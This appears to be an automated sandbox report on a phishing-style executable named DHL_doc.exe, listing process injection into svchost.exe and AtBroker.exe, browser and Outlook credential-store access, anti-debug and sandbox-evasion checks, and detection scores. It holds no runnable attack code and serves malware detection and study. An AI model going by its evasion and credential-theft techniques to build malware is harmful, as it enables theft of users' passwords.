Jump to behavior

Source: DHL_doc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\DHL_doc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: AtBroker.exe, 00000004.00000003.2177434309.0000000003033000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.3565066450.0000000003033000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000003.2176599837.0000000003011000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: DHL_doc.exe	ReversingLabs: Detection: 36%
Source: DHL_doc.exe	Virustotal: Detection: 29%

Source: unknown	Process created: C:\Users\user\Desktop\DHL_doc.exe "C:\Users\user\Desktop\DHL_doc.exe"
Source: C:\Users\user\Desktop\DHL_doc.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL_doc.exe"
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"
Source: C:\Windows\SysWOW64\AtBroker.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\DHL_doc.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL_doc.exe"	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DHL_doc.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL_doc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL_doc.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL_doc.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL_doc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL_doc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL_doc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL_doc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL_doc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL_doc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL_doc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\AtBroker.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\AtBroker.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: DHL_doc.exe

Static file information: File size 1715200 > 1048576

Source: DHL_doc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: DHL_doc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: DHL_doc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: DHL_doc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: DHL_doc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: DHL_doc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: DHL_doc.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hubOySeXSAbhw.exe, 00000003.00000002.3564846691.000000000059E000.00000002.00000001.01000000.00000005.sdmp, hubOySeXSAbhw.exe, 00000007.00000002.3564848003.000000000059E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: ATBroker.pdb source: svchost.exe, 00000001.00000003.1919617894.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1919532152.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, hubOySeXSAbhw.exe, 00000003.00000002.3565378032.0000000000F18000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: DHL_doc.exe, 00000000.00000003.1704911625.0000000004610000.00000004.00001000.00020000.00000000.sdmp, DHL_doc.exe, 00000000.00000003.1703872587.00000000042D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1855867126.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1849902640.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1951474485.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1951474485.000000000329E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000003.1997323348.0000000004C23000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.3566190507.0000000004F6E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.3566190507.0000000004DD0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000003.1995290391.0000000004A72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DHL_doc.exe, 00000000.00000003.1704911625.0000000004610000.00000004.00001000.00020000.00000000.sdmp, DHL_doc.exe, 00000000.00000003.1703872587.00000000042D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1855867126.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1849902640.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1951474485.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1951474485.000000000329E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, AtBroker.exe, 00000004.00000003.1997323348.0000000004C23000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.3566190507.0000000004F6E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.3566190507.0000000004DD0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000003.1995290391.0000000004A72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: AtBroker.exe, 00000004.00000002.3566599950.00000000053FC000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000004.00000002.3565066450.0000000002FBA000.00000004.00000020.00020000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000000.2065968066.000000000301C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2289880564.000000001C1EC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: ATBroker.pdbGCTL source: svchost.exe, 00000001.00000003.1919617894.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1919532152.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, hubOySeXSAbhw.exe, 00000003.00000002.3565378032.0000000000F18000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: AtBroker.exe, 00000004.00000002.3566599950.00000000053FC000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000004.00000002.3565066450.0000000002FBA000.00000004.00000020.00020000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000000.2065968066.000000000301C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2289880564.000000001C1EC000.00000004.80000000.00040000.00000000.sdmp

Source: DHL_doc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: DHL_doc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: DHL_doc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: DHL_doc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: DHL_doc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00EC42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00EC42DE

Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00EE0A76 push ecx; ret	0_2_00EE0A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00617866 push FFFFFFD4h; iretd	1_2_00617880
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0060D152 push edi; iretd	1_2_0060D1EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00603100 push eax; ret	1_2_00603102
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0060D1DE push edi; iretd	1_2_0060D1EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00605A8E push ds; ret	1_2_00605A91
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00608338 push ebx; retf	1_2_0060833E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00611BF6 push B5504480h; ret	1_2_00611C05
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00618C7F pushad ; iretd	1_2_00618C8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0060BC36 push edi; ret	1_2_0060BC3B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00614C1D pushad ; ret	1_2_00614C1E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0061848E push eax; iretd	1_2_006184AC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006156C1 push FFFFFFE6h; ret	1_2_00615703
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00618EB6 push edi; ret	1_2_00618EB8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0061A7AE push cs; retf	1_2_0061A7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0310225F pushad ; ret	1_2_031027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031027FA pushad ; ret	1_2_031027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031309AD push ecx; mov dword ptr [esp], ecx	1_2_031309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0310283D push eax; iretd	1_2_03102858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0310135E push eax; iretd	1_2_03101369
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04DD27FA pushad ; ret	4_2_04DD27F9
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04DD225F pushad ; ret	4_2_04DD27F9
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04DD283D push eax; iretd	4_2_04DD2858
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E009AD push ecx; mov dword ptr [esp], ecx	4_2_04E009B6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_02EA4763 push FFFFFFD4h; iretd	4_2_02EA477D
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_02EA25BE push FFFFFFE6h; ret	4_2_02EA2600
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_02E9EAF3 push B5504480h; ret	4_2_02E9EB02
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_02E98B33 push edi; ret	4_2_02E98B38
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_02E9298B push ds; ret	4_2_02E9298E
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_02E95235 push ebx; retf	4_2_02E9523B
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_02EA538B push eax; iretd	4_2_02EA53A9

Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00EDF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00EDF98E
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F51C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00F51C41

Source: C:\Users\user\Desktop\DHL_doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\DHL_doc.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-96663

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\DHL_doc.exe	API/Special instruction interceptor: Address: 24C3234
Source: C:\Windows\SysWOW64\AtBroker.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\AtBroker.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\AtBroker.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\AtBroker.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\AtBroker.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\AtBroker.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\AtBroker.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\AtBroker.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0317096E rdtsc

1_2_0317096E

Source: C:\Windows\SysWOW64\AtBroker.exe	Window / User API: threadDelayed 4413			Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Window / User API: threadDelayed 5559			Jump to behavior

Source: C:\Users\user\Desktop\DHL_doc.exe	API coverage: 3.5 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.6 %
Source: C:\Windows\SysWOW64\AtBroker.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\AtBroker.exe TID: 7700	Thread sleep count: 4413 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 7700	Thread sleep time: -8826000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 7700	Thread sleep count: 5559 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 7700	Thread sleep time: -11118000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe TID: 7716	Thread sleep time: -55000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe TID: 7716	Thread sleep time: -42000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\AtBroker.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\AtBroker.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F368EE FindFirstFileW,FindClose,	0_2_00F368EE
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F3698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_00F3698F
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F2D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00F2D076
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F2D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00F2D3A9
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F39642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00F39642
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F3979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00F3979D
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F2DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00F2DBBE
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F39B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00F39B2B
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F35C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00F35C97
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_02EAC720 FindFirstFileW,FindNextFileW,FindClose,	4_2_02EAC720

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00EC42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00EC42DE

Source: firefox.exe, 00000008.00000002.2291279032.000002965C0FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAAG
Source: hubOySeXSAbhw.exe, 00000007.00000002.3565656958.00000000011E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
Source: AtBroker.exe, 00000004.00000002.3565066450.0000000002FBA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0317096E rdtsc

1_2_0317096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_006177D3 LdrLoadDll,

1_2_006177D3

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00F3EAA2 BlockInput,

0_2_00F3EAA2

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00EF2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00EF2622

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00EC42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00EC42DE

Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00EE4CE8 mov eax, dword ptr fs:[00000030h]	0_2_00EE4CE8
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_024C34A0 mov eax, dword ptr fs:[00000030h]	0_2_024C34A0
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_024C3500 mov eax, dword ptr fs:[00000030h]	0_2_024C3500
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_024C1E70 mov eax, dword ptr fs:[00000030h]	0_2_024C1E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312C310 mov ecx, dword ptr fs:[00000030h]	1_2_0312C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03208324 mov eax, dword ptr fs:[00000030h]	1_2_03208324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03208324 mov ecx, dword ptr fs:[00000030h]	1_2_03208324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03208324 mov eax, dword ptr fs:[00000030h]	1_2_03208324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03208324 mov eax, dword ptr fs:[00000030h]	1_2_03208324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03150310 mov ecx, dword ptr fs:[00000030h]	1_2_03150310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h]	1_2_0316A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h]	1_2_0316A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h]	1_2_0316A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]	1_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]	1_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]	1_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B035C mov ecx, dword ptr fs:[00000030h]	1_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]	1_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]	1_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FA352 mov eax, dword ptr fs:[00000030h]	1_2_031FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D8350 mov ecx, dword ptr fs:[00000030h]	1_2_031D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
